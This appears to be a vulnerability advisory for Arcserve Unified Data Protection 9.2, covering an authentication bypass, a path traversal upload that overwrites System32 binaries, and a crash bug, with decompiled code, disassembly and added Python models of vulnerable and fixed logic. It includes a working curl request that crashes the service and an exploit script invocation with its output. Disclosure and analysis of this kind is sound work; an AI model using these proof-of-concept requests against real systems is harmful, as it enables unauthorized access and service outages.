Multiple vulnerabilities exist in Arcserve Unified Data Protection (UDP) 9.2.
CVE-2024-0799 - wizardLogin Authentication Bypass (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
An authentication bypass vulnerability exists in edge-app-base-webui.jar!com.ca.arcserve.edge.app.base.ui.server.EdgeLoginServiceImpl.doLogin(). When a null password is passed to the method, the credential check is skipped and the application's own UUID is used to authenticate the session instead:
public void doLogin(HttpSession session, Boolean isLocal, String username, String password, String domain, String hostname, String protocol, int port) throws ClientException {
    [...]
    if (password != null) {
        // normal path: credentials are checked against the backend
        client.getBaseService().validateUser(username, password, domain);
    } else {
        // null password: the server itself looks up the UUID that validateUserByUUID() expects
        String uuid = CommonUtil.retrieveCurrentAppUUID();
        if (ConsoleConfiguration.getInstance().getRemoteWebservice() != null &&
                Boolean.valueOf(ConsoleConfiguration.getInstance().getRemoteWebservice().getUdpUseWebservice()).booleanValue()) {
            logger.info("get uuid by webservice");
            uuid = client.getBaseService().validateUserByUser(ConsoleConfiguration.getInstance().getRemoteWebservice().getRemoteUdpWebserviceUserName(),
                    ConsoleConfiguration.getInstance().getRemoteWebservice().getRemoteUdpWebservicePassword(),
                    ConsoleConfiguration.getInstance().getRemoteWebservice().getRemoteUdpWebserviceHost());
        }
        // nothing supplied by the caller is checked on this path
        client.getBaseService().validateUserByUUID(uuid);
    }
    [...]
Because doLogin() itself obtains the correct UUID (locally, or from the configured remote UDP web service) and then passes it to validateUserByUUID(), nothing the caller supplies is ever verified on this path: the login succeeds whenever the password is absent.
An unauthenticated remote attacker can exploit this by sending a POST request to the /management/wizardLogin endpoint that omits the password parameter, so that doLogin() receives a null password. Once the session is authenticated, the attacker can perform any UDP Console task that requires authentication.
PoC:
This vulnerability is chained with the following vulnerability to achieve unauthenticated path traversal file upload; its PoC is incorporated into the PoC of the following vulnerability.
CVE-2024-0800 - Authenticated Path Traversal File Upload (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
A path traversal vulnerability exists in edge-app-base-webui.jar!com.ca.arcserve.edge.app.base.ui.server.servlet.ImportNodeServlet. The file name supplied by the client is appended to a temporary upload directory without being validated. An authenticated remote attacker (or an unauthenticated one, by chaining CVE-2024-0799 above) can exploit this to upload arbitrary files to any directory on the file system of the host where the UDP Console is installed. The upload operation is carried out under the security context of SYSTEM, so existing system binaries can be overwritten.
PoC:
python3 arcserve_udp_console_wizardLogin_auth_bypass.py -t <target> -p 8015 -f /tmp/malicious_file -s '\Windows\System32\existing_exe_to_be_replaced.exe'
Logging in to Arcserve UDP Console via wizardLogin (Authentication Bypass)
Uploading local file /tmp/malicious_file to \Windows\System32\existing_exe_to_be_replaced.exe on the target host
The local file was uploaded to the target host as the following:
C:\Program Files\Arcserve\Unified Data Protection\Management\Report\Temp\2023_12_01__20_54_58_355\/../../../../../../../../..//Windows/System32/existing_exe_to_be_replaced.exe
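The following Python model, added here and not part of the original advisory or of Arcserve's code, reproduces the path computation visible in the PoC output above (temporary directory, a backslash, then the client-supplied file name, exactly as the servlet evidently concatenates them) and places a hardened alternative beside it. The upload directory and file name are copied from the output above; the function names and the UnsafeFileName exception are the example's own. It uses ntpath so the Windows semantics can be exercised on any platform.

```python
import ntpath

# Upload directory and attacker-supplied file name, copied from the PoC
# output above (the file name is everything after the timestamped directory).
UPLOAD_DIR = (r"C:\Program Files\Arcserve\Unified Data Protection"
              r"\Management\Report\Temp\2023_12_01__20_54_58_355")
TRAVERSAL_NAME = r"/../../../../../../../../..//Windows/System32/existing_exe_to_be_replaced.exe"


def vulnerable_target_path(upload_dir: str, name: str) -> str:
    """Model of the vulnerable servlet: the client-supplied name is appended to
    the temp directory unchecked; Windows then resolves every '..' segment
    (more '..' than there are directories simply stops at the drive root)."""
    raw = upload_dir + "\\" + name      # the string the servlet builds
    return ntpath.normpath(raw)         # the path the filesystem actually opens


class UnsafeFileName(ValueError):
    pass


def safe_target_path(upload_dir: str, name: str) -> str:
    """Hardened version: accept only a bare file name, then verify that the
    normalized target is a direct child of the upload directory."""
    if name in ("", ".", "..") or ntpath.basename(name) != name:
        # Any separator, drive letter or parent reference makes basename differ.
        raise UnsafeFileName(f"rejected file name: {name!r}")
    if name != name.rstrip(". "):
        # Win32 strips trailing dots/spaces, which can defeat extension checks.
        raise UnsafeFileName(f"rejected file name: {name!r}")
    base = ntpath.normpath(upload_dir)
    target = ntpath.normpath(ntpath.join(base, name))
    # Containment check, case-insensitive like NTFS by default.
    if ntpath.normcase(ntpath.dirname(target)) != ntpath.normcase(base):
        raise UnsafeFileName(f"{name!r} escapes {upload_dir!r}")
    return target


if __name__ == "__main__":
    print("vulnerable:", vulnerable_target_path(UPLOAD_DIR, TRAVERSAL_NAME))
    try:
        safe_target_path(UPLOAD_DIR, TRAVERSAL_NAME)
    except UnsafeFileName as e:
        print("hardened:", e)
```

The vulnerable function resolves the PoC name to C:\Windows\System32\existing_exe_to_be_replaced.exe, which is why the upload lands in System32 regardless of how many "..\" segments are sent; the hardened function rejects the name before any path is built, and the containment check catches anything the name filter might miss.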
CVE-2024-0801 - Unauthenticated DoS in ASNative.dll (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
When logging in to the Arcserve UDP Console with the validateUserByUser API call, the login username is processed by code in ASNative.dll. If the username is a fully qualified username (i.e., domain\username or domain/username), the domain part is extracted by calling wcsncpy_s():
// ASNative.dll, file version 9.0.6034.674
[...]
.text:0000000180009203 chk_username: ; CODE XREF: do_login+93↓j
.text:0000000180009203 movzx eax, word ptr [r14]
.text:0000000180009207 cmp ax, 5Ch ; '\'
.text:000000018000920B jz short loc_18000922C
.text:000000018000920D cmp ax, 2Fh ; '/'
.text:0000000180009211 jz short loc_18000922C
.text:0000000180009213 cmp ax, 40h ; '@'
.text:0000000180009217 jz short loc_180009227
.text:0000000180009219 inc r15
.text:000000018000921C add r14, 2
.text:0000000180009220 cmp r15, rbp
.text:0000000180009223 jb short chk_username
[...]
.text:0000000180009234 lea rdi, [r15+r15]
.text:0000000180009238 lea rcx, [rdi+2] ; Size
.text:000000018000923C call cs:__imp_malloc
.text:0000000180009242 lea r8, [rdi+2] ; Size
.text:0000000180009246 xor edx, edx ; Val
.text:0000000180009248 mov rcx, rax ; void *
.text:000000018000924B mov r13, rax
.text:000000018000924E call memset
.text:0000000180009253 mov r9, r15 ; MaxCount
.text:0000000180009256 mov r8, r12 ; Source
.text:0000000180009259 mov rdx, rdi ; SizeInWords
.text:000000018000925C mov rcx, r13 ; Destination
.text:000000018000925F ; copy domain part in domain\username
.text:000000018000925F call cs:wcsncpy_s
[...]
The loop at chk_username counts the characters before the first \ or / into r15. If the fully qualified username starts with \ or /, the loop exits with r15 == 0, so rdi = r15 + r15 = 0 is passed as the second parameter (numberOfElements, the destination size) to wcsncpy_s(). The CRT treats a zero numberOfElements as an invalid parameter and invokes the invalid parameter handler, which by default terminates the process. Because validateUserByUser can be called without authentication, an unauthenticated remote attacker can crash the UDP Console service with a single request.
PoC:
curl -sk -H 'Content-Type:text/xml' -d '<?xml version="1.0" encoding="UTF-8"?><S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/"><S:Body><ns2:validateUserByUser xmlns:ns2="http://webservice.edge.arcserve.ca.com/"><arg0>\</arg0><arg1>password</arg1><arg2>domain</arg2></ns2:validateUserByUser></S:Body></S:Envelope>' 'https://<target-host>:8015/management/services/EdgeServiceConsoleImpl'
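To make the arithmetic in the listing concrete, here is a Python model of the username scan and of the two arguments it hands to wcsncpy_s(), with the missing check beside it. It is an added illustration, not Arcserve code: the function names and the InvalidParameter exception (standing in for the CRT invalid parameter handler) are the example's own, and the '@' branch that the listing sends to loc_180009227 is deliberately not modeled.

```python
# Model of the domain-part extraction in ASNative.dll shown above.  Added
# illustration, not Arcserve code; names are the example's own.

DOMAIN_SEPARATORS = ("\\", "/")    # cmp ax, 5Ch and cmp ax, 2Fh in the listing


class InvalidParameter(RuntimeError):
    """Raised where the real CRT would invoke the invalid parameter handler,
    which by default terminates the process."""


def model_wcsncpy_s(number_of_elements: int, source: str, count: int) -> str:
    """wcsncpy_s(dest, numberOfElements, src, count) parameter validation as
    Microsoft documents it: a destination of zero elements is invalid, and so
    is a copy that would not fit."""
    if number_of_elements == 0:
        raise InvalidParameter("wcsncpy_s: numberOfElements == 0")
    data = source[:count]
    if len(data) >= number_of_elements:
        raise InvalidParameter("wcsncpy_s: destination too small")
    return data


def scan_username(username: str):
    """The chk_username loop: index of the first '\\' or '/' (the value left
    in r15), or None when the name contains no separator."""
    for i, ch in enumerate(username):
        if ch in DOMAIN_SEPARATORS:
            return i
        if ch == "@":
            raise NotImplementedError("user@domain branch not modeled")
    return None


def wcsncpy_s_arguments(username: str):
    """(numberOfElements, count) exactly as the listing computes them:
    rdi = r15 + r15 is passed as SizeInWords and r15 as MaxCount."""
    r15 = scan_username(username)
    if r15 is None:
        return None
    return 2 * r15, r15


def extract_domain_vulnerable(username: str):
    """Faithful to the listing: no check on the domain length, so a name that
    starts with '\\' or '/' reaches wcsncpy_s with numberOfElements = 0."""
    args = wcsncpy_s_arguments(username)
    if args is None:
        return None                  # no domain part; outside the listing
    number_of_elements, count = args
    return model_wcsncpy_s(number_of_elements, username, count)


def extract_domain_fixed(username: str):
    """The missing check: an empty domain part is a bad login to be rejected,
    not a reason to hand a zero-sized buffer to the CRT."""
    r15 = scan_username(username)
    if r15 is None:
        return None
    if r15 == 0:
        raise ValueError("empty domain in fully qualified username")
    return username[:r15]


if __name__ == "__main__":
    print(wcsncpy_s_arguments("CORP\\administrator"))   # (8, 4)
    print(wcsncpy_s_arguments("\\"))                    # (0, 0), the PoC username
    try:
        extract_domain_vulnerable("\\")
    except InvalidParameter as e:
        print("process would terminate:", e)
```

Running it with the PoC username "\" from the curl request above raises InvalidParameter at exactly the point where the listing calls wcsncpy_s; the fixed variant turns the same input into a rejected login and the process survives.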